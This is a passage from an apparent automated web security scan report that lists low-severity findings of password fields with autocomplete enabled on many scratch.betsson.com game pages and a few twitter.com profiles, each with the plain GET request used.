13.55. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Ocean-Pearl

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Ocean-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.56. https://scratch.betsson.com/en/Fantasy/Outer-Space previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Outer-Space

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Outer-Space

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Outer-Space HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.57. https://scratch.betsson.com/en/Fantasy/Super-Chance previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Super-Chance

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Super-Chance

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Super-Chance HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.58. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/The-Fairy-Tale

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/The-Fairy-Tale HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.59. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/The-Lost-Maya

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.60. https://scratch.betsson.com/en/Fantasy/Treasure-Island previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Treasure-Island

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Treasure-Island

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Treasure-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.61. https://scratch.betsson.com/en/Fantasy/Zodiac previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Zodiac

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Zodiac

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Zodiac HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.62. https://scratch.betsson.com/en/GameHistory previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/GameHistory

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/GameHistory

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/GameHistory HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.63. https://scratch.betsson.com/en/Information previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Information

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Information

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Information HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.64. https://scratch.betsson.com/en/News previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/News

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/News

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/News HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.65. https://scratch.betsson.com/en/OurScratchcards previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/OurScratchcards

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/OurScratchcards

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/OurScratchcards HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.66. https://scratch.betsson.com/en/Ourwinners previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Ourwinners

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Ourwinners

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Ourwinners HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.67. https://scratch.betsson.com/en/Slots/5th-Avenue previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/5th-Avenue

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/5th-Avenue

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/5th-Avenue HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.68. https://scratch.betsson.com/en/Slots/Adventure-Jack previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Adventure-Jack

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Adventure-Jack

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Adventure-Jack HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.69. https://scratch.betsson.com/en/Slots/Atlantis previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Atlantis

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Atlantis

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Atlantis HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.70. https://scratch.betsson.com/en/Slots/Bon-Apetit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Bon-Apetit

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Bon-Apetit

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Bon-Apetit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.71. https://scratch.betsson.com/en/Slots/Cafe-Paris previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Cafe-Paris

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Cafe-Paris

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Cafe-Paris HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.72. https://scratch.betsson.com/en/Slots/Castle-Slots previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Castle-Slots

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Castle-Slots

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Castle-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.73. https://scratch.betsson.com/en/Slots/Chic-Boutique previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Chic-Boutique

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Chic-Boutique

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Chic-Boutique HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.74. https://scratch.betsson.com/en/Slots/Conga-Beat previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Conga-Beat

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Conga-Beat

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Conga-Beat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.75. https://scratch.betsson.com/en/Slots/Egyptian-Magic previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Egyptian-Magic

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Egyptian-Magic

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Egyptian-Magic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.76. https://scratch.betsson.com/en/Slots/Esmeralda previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Esmeralda

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Esmeralda

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Esmeralda HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.77. https://scratch.betsson.com/en/Slots/Fair-Play previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Fair-Play

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Fair-Play

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Fair-Play HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.78. https://scratch.betsson.com/en/Slots/Fantasia previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Fantasia

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Fantasia

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.79. https://scratch.betsson.com/en/Slots/Grand-Crown previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Grand-Crown

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Grand-Crown

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Grand-Crown HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.80. https://scratch.betsson.com/en/Slots/Holiday-Hotel previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Holiday-Hotel

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Holiday-Hotel

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Holiday-Hotel HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.81. https://scratch.betsson.com/en/Slots/Ice-Land previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Ice-Land

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Ice-Land

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Ice-Land HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.82. https://scratch.betsson.com/en/Slots/Legend-Of-Terra previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Legend-Of-Terra

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Legend-Of-Terra

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Legend-Of-Terra HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.83. https://scratch.betsson.com/en/Slots/Monaco-Glamour previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Monaco-Glamour

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Monaco-Glamour

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Monaco-Glamour HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.84. https://scratch.betsson.com/en/Slots/Monte-Carlo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Monte-Carlo

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Monte-Carlo

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Monte-Carlo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.85. https://scratch.betsson.com/en/Slots/Pirates-Paradise previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Pirates-Paradise

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Pirates-Paradise

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Pirates-Paradise HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.86. https://scratch.betsson.com/en/Slots/Sakura-Garden previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sakura-Garden

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Sakura-Garden

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Sakura-Garden HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.87. https://scratch.betsson.com/en/Slots/Sea-And-Sun previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sea-And-Sun

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Sea-And-Sun

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Sea-And-Sun HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.88. https://scratch.betsson.com/en/Slots/Sky-Of-Love previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sky-Of-Love

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Sky-Of-Love

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Sky-Of-Love HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.89. https://scratch.betsson.com/en/Slots/Triple-Carnival previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Triple-Carnival

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Triple-Carnival

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Triple-Carnival HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.90. https://scratch.betsson.com/en/Slots/Tropical-Fruit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Tropical-Fruit

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Slots/Tropical-Fruit

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Slots/Tropical-Fruit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.91. https://scratch.betsson.com/en/Sports/100m-Champion previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/100m-Champion

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/100m-Champion

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/100m-Champion HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.92. https://scratch.betsson.com/en/Sports/Bowling previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Bowling

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Bowling

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.93. https://scratch.betsson.com/en/Sports/Darts previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Darts

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Darts

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Darts HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.94. https://scratch.betsson.com/en/Sports/Goal-Kick previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Goal-Kick

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Goal-Kick

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Goal-Kick HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.95. https://scratch.betsson.com/en/Sports/Gone-Fishing previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Gone-Fishing

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Gone-Fishing

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Gone-Fishing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.96. https://scratch.betsson.com/en/Sports/Hippodrome previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Hippodrome

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Hippodrome

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Hippodrome HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.97. https://scratch.betsson.com/en/Sports/Ready-Set-Go previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Ready-Set-Go

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Ready-Set-Go

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Ready-Set-Go HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.98. https://scratch.betsson.com/en/Sports/Road-Racing previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Road-Racing

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/Road-Racing

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Sports/Road-Racing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.99. https://scratch.betsson.com/en/Sports/World-Champions previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/World-Champions

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Sports/World-Champions

The form contains the following password field with autocomplete enabled:

tbPassword

Request

Response

13.100. http://twitter.com/PostcodeLottery previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PostcodeLottery

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.101. http://twitter.com/PrimeScratch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PrimeScratch

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.102. http://twitter.com/crazyscratch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/crazyscratch

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
